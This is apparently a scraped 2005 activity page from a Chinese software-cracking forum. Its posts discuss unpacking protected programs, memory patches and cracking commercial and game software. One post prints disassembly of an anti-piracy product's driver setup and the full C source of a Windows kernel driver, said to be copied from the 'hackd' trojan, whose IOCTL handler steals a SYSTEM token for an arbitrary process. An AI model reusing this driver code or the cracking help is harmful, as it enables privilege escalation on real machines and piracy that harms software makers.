|
|
|
[ZT][密界脱壳文集]第二版下载
Tue Feb 15 16:57:57 2005 220-☆☆ 欢迎访问 清华大学27号楼服务器 ☆☆ |
|
|
|
破解 英语口语对话王 2005 0203
最初由 Genius 发布 那就内存补丁好了,这个好像是UPX用了一些伪装类的工具处理了的,脱壳可以运行的,我脱过,要想兼容性好,还是内存补丁吧。 |
|
|
|
[2005.2月话题]如何隐藏跳转指令
一个简单的流程记录器,全部KO这些所有的想法。 |
|
|
|
极难去的NAG
把原版拿出来,谁要你的烂破解版 |
|
|
|
请教传世VIP1.74 怎么破啊
小心的发给我,我给你看看 |
|
|
|
|
|
|
|
Second段内存断点――比泰软件防盗版战士2005J V1.00脱壳
最初由 采臣・宁 发布 你怎么老是抬你师父,师父固然重要,但也仅仅起到抛砖引玉的作用。 |
|
Second段内存断点――比泰软件防盗版战士2005J V1.00脱壳
00401B27 |> \6A 00 push 0 ; /Password = NULL 00401B29 |. 6A 00 push 0 ; |ServiceStartName = NULL 00401B2B |. 6A 00 push 0 ; |pDependencies = NULL 00401B2D |. 6A 00 push 0 ; |pTagId = NULL 00401B2F |. 6A 00 push 0 ; |LoadOrderGroup = NULL 00401B31 |. 55 push ebp ; |BinaryPathName 00401B32 |. 6A 01 push 1 ; |ErrorControl = SERVICE_ERROR_NORMAL 00401B34 |. 6A 03 push 3 ; |StartType = SERVICE_DEMAND_START 00401B36 |. 6A 01 push 1 ; |ServiceType = SERVICE_KERNEL_DRIVER 00401B38 |. 68 FF010F00 push 0F01FF ; |DesiredAccess = SERVICE_ALL_ACCESS 00401B3D |. 68 F8BD4000 push 复件_Chk.0040BDF8 ; |DisplayName = "InterruptHook" 00401B42 |. 68 F8BD4000 push 复件_Chk.0040BDF8 ; |ServiceName = "InterruptHook" 00401B47 |. 56 push esi ; |hManager 看到这个参数没有,如果我没猜错的话,这个东西的驱动是抄HACK界一牛人木马hackd对外公开的驱动的源代码。 别以为你有我就没有,有这个代码的人太多了。 PDEVICE_OBJECT DriverDeviceObject = NULL; ULONG out_size; int handle_fobject(PFILE_OBJECT fobject, PUCHAR obuffer) { ULONG length; ANSI_STRING astring; PUCHAR fname, cur_pointer; PFILE_OBJECT related_fobject; UCHAR status; fname=obuffer+12; status=0; if(fobject->DeviceObject!=NULL) { if(NT_SUCCESS(ObQueryNameString(fobject->DeviceObject, (POBJECT_NAME_INFORMATION)fname,out_size-20,&length))) { if(NT_SUCCESS(RtlUnicodeStringToAnsiString(&astring, (PUNICODE_STRING)fname,TRUE))) { *fname='\0'; strncpy(fname, astring.Buffer, astring.Length+1); status=1; fname+=astring.Length; *fname='\0'; RtlFreeAnsiString(&astring); } } } if((length=fobject->FileName.Length>>1)||(fobject->RelatedFileObject!=NULL)) { related_fobject=fobject->RelatedFileObject; if(length&&(fobject->FileName.Buffer[0]!='\\')) while(related_fobject!=NULL) { length+=related_fobject->FileName.Length>>1; related_fobject=related_fobject->RelatedFileObject; } if(length) { RtlUnicodeStringToAnsiString(&astring,&(fobject->FileName),TRUE); strncpy(cur_pointer=fname+(length-(fobject->FileName.Length>>1)), astring.Buffer,astring.Length+1); status=1; RtlFreeAnsiString(&astring); related_fobject=fobject->RelatedFileObject; if(fobject->FileName.Buffer[0]!='\\') while(related_fobject!=NULL) { *(cur_pointer-1)='\\'; cur_pointer-=(related_fobject->FileName.Length>>1);//+1; RtlUnicodeStringToAnsiString(&astring,&(related_fobject->FileName), TRUE); strncpy(cur_pointer, astring.Buffer, astring.Length+1); status=1; RtlFreeAnsiString(&astring); related_fobject=related_fobject->RelatedFileObject; } } } return(status?(fname-obuffer)+length:0); } NTSTATUS DriverIO(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp) { Irp->IoStatus.Status = STATUS_SUCCESS; IoCompleteRequest(Irp,IO_NO_INCREMENT); return Irp->IoStatus.Status; } NTSTATUS DriverIOControl(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp) { PIO_STACK_LOCATION stack; UCHAR *in_buffer, *out_buffer; ULONG code,ret,pid,handle_object,return_length,target_pid,sys_pid; UCHAR buffer[1024]; PEPROCESS eprocess; HANDLE handle,hTarget,hSys,hSysToken; OBJECT_ATTRIBUTES object_attr; CLIENT_ID client_id; PROCESS_ACCESS_TOKEN dup_token; stack = IoGetCurrentIrpStackLocation(Irp); out_size = stack->Parameters.DeviceIoControl.OutputBufferLength; code = stack->Parameters.DeviceIoControl.IoControlCode; in_buffer = out_buffer = Irp->AssociatedIrp.SystemBuffer; ret = STATUS_SUCCESS; switch(code) { case IOCTL_GET_NAME_STRING: { pid = ((DIB_NAME_STRING *)in_buffer)->pid; handle = ((DIB_NAME_STRING *)in_buffer)->hwnd; ((DOB_NAME_STRING *)out_buffer)->status = 0; Irp->IoStatus.Information = sizeof(ULONG); if(NT_SUCCESS(PsLookupProcessByProcessId((PVOID)pid,&eprocess))) { KeAttachProcess(eprocess); if(NT_SUCCESS(ObReferenceObjectByHandle(handle,0x80000000,0,0, (void *)&handle_object,0))) { if(*(USHORT *)handle_object==5 && *((USHORT *)handle_object+1)==0x70) { if(return_length=handle_fobject((PFILE_OBJECT)handle_object, out_buffer)) { ((DOB_NAME_STRING *)out_buffer)->status=1; Irp->IoStatus.Information+=return_length; *((USHORT *)out_buffer+2)=(USHORT)(return_length-12); } } else { if(NT_SUCCESS(ObQueryNameString((void *)handle_object, (POBJECT_NAME_INFORMATION)buffer, sizeof(buffer),&return_length))) if(((UNICODE_STRING *)buffer)->Buffer!=NULL) { ((DOB_NAME_STRING *)out_buffer)->name.MaximumLength \ = (USHORT)out_size-20; ((DOB_NAME_STRING *)out_buffer)->name.Buffer \ = (char *)((ULONG *)out_buffer+3); if(NT_SUCCESS(RtlUnicodeStringToAnsiString( &((DOB_NAME_STRING *)out_buffer)->name, (UNICODE_STRING *)buffer,FALSE))) { ((DOB_NAME_STRING *)out_buffer)->status = 1; Irp->IoStatus.Information += 8+ ((DOB_NAME_STRING *)out_buffer)->name.Length; } } ObDereferenceObject((void *)handle_object); } } KeDetachProcess(); ObDereferenceObject((void *)eprocess); } break; } case IOCTL_IMPERSONATE_PROCESS: { target_pid = ((DIB_IMPERSONATE_PROCESS *)in_buffer)->TargetProcess; sys_pid = ((DIB_IMPERSONATE_PROCESS *)in_buffer)->SystemProcess; ((DOB_IMPERSONATE_PROCESS *)out_buffer)->status = 0; Irp->IoStatus.Information = sizeof(ULONG); object_attr.Length = sizeof(object_attr); object_attr.RootDirectory = 0; object_attr.ObjectName = NULL; object_attr.Attributes = 0; object_attr.SecurityDescriptor = NULL; object_attr.SecurityQualityOfService = NULL; client_id.UniqueProcess = (HANDLE)target_pid; client_id.UniqueThread = 0; if (NT_SUCCESS(ZwOpenProcess(&hTarget,PROCESS_ALL_ACCESS,&object_attr, &client_id))) { client_id.UniqueProcess = (HANDLE)sys_pid; client_id.UniqueThread = 0; if (NT_SUCCESS(ZwOpenProcess(&hSys,PROCESS_ALL_ACCESS,&object_attr, &client_id))) { if (NT_SUCCESS(ZwOpenProcessToken(hSys,TOKEN_ALL_ACCESS,&hSysToken))) { if (NT_SUCCESS(ZwDuplicateToken(hSysToken,TOKEN_ALL_ACCESS, &object_attr,FALSE,TokenPrimary, &dup_token.Token))) { dup_token.Thread = 0; if (NT_SUCCESS(ZwSetInformationProcess(hTarget, ProcessAccessToken, &dup_token, sizeof(dup_token)))) ((DOB_IMPERSONATE_PROCESS *)out_buffer)->status = 1; ZwClose(dup_token.Token); } ZwClose(hSysToken); } ZwClose(hSys); } ZwClose(hTarget); } break; } default: ((DOB_UNKNOWN *)out_buffer)->status = 0; Irp->IoStatus.Information = sizeof(DOB_UNKNOWN); ret = STATUS_INVALID_DEVICE_REQUEST; break; } Irp->IoStatus.Status = ret; IoCompleteRequest(Irp,IO_NO_INCREMENT); return ret; } VOID DriverUnload(IN PDRIVER_OBJECT DriverObject) { UNICODE_STRING win32DeviceName; RtlInitUnicodeString(&win32DeviceName,DOS_DEVICE_NAME); IoDeleteSymbolicLink(&win32DeviceName); IoDeleteDevice(DriverDeviceObject); } NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath) { UNICODE_STRING ntDeviceName; UNICODE_STRING win32DeviceName; NTSTATUS status; RtlInitUnicodeString(&ntDeviceName,NT_DEVICE_NAME); if (!NT_SUCCESS(status = IoCreateDevice(DriverObject,0,&ntDeviceName, FILE_DEVICE_UNKNOWN,0,FALSE, &DriverDeviceObject))) return STATUS_NO_SUCH_DEVICE; DriverDeviceObject->Flags |= DO_BUFFERED_IO; RtlInitUnicodeString(&win32DeviceName,DOS_DEVICE_NAME); if (!NT_SUCCESS(status = IoCreateSymbolicLink(&win32DeviceName, &ntDeviceName))) return STATUS_NO_SUCH_DEVICE; DriverObject->MajorFunction[IRP_MJ_CREATE ] = DriverIO; DriverObject->MajorFunction[IRP_MJ_CLOSE ] = DriverIO; DriverObject->MajorFunction[IRP_MJ_READ ] = DriverIO; DriverObject->MajorFunction[IRP_MJ_WRITE ] = DriverIO; DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = DriverIOControl; DriverObject->DriverUnload = DriverUnload; return STATUS_SUCCESS; } |
|
[翻译]在xp+olly下实现和98+SICE的断点HMEMCPY
这东西在2K下也可以用不过断是断它所说的正确地方了,但其实真正有意义的动作早已经过去,跟HMEMCPY根本有天壤之别。 |
|
Second段内存断点――比泰软件防盗版战士2005J V1.00脱壳
最初由 采臣・宁 发布 我一直在关注有哪位牛人能写出一种原理叫寄生机的家伙,呵呵,这可是好东西啊,可以对付所有的代码抽取变型的壳,当然包括XPR。当大家都来玩RING0大战的时候,64BIT系统可能已经成为主流了,目前能够写这个东西的,根据我知道的,还是有几个人的。 |
|
Second段内存断点――比泰软件防盗版战士2005J V1.00脱壳
最初由 采臣・宁 发布 不是,我这话是针对如何做成世界最强的Cracker,当你已经达到这个程度时,难道你不就是最好的加密者? 知道这个词怎么来的,道高一尺魔高一丈,先有加密再有破解,破解是因为加密而存在。因此加密是要是高于破解,那么这句经典古言也就不存在了。 |
|
Second段内存断点――比泰软件防盗版战士2005J V1.00脱壳
最初由 采臣・宁 发布 我所领悟到的破解的最高境界 一句话: 能够做到让破解与加密融合一体的人,他应该是世界最强的人。虽然这个人依然还是个Cracker. 这句话你可能听起来有些矛盾,但要靠自己领悟了。现成的技巧与技术其实也是昙花一现,我们还不是跟着人家走,不管这个系统是国产的还是国外的。 |
操作理由
RANk
{{ user_info.golds == '' ? 0 : user_info.golds }}
雪币
{{ experience }}
课程经验
{{ score }}
学习收益
{{study_duration_fmt}}
学习时长
基本信息
荣誉称号:
{{ honorary_title }}
能力排名:
No.{{ rank_num }}
等 级:
LV{{ rank_lv-100 }}
活跃值:
在线值:
浏览人数:{{ visits }}
最近活跃:{{ last_active_time }}
注册时间:{{ user_info.create_date_jsonfmt }}
勋章
兑换勋章
证书
证书查询 >
能力值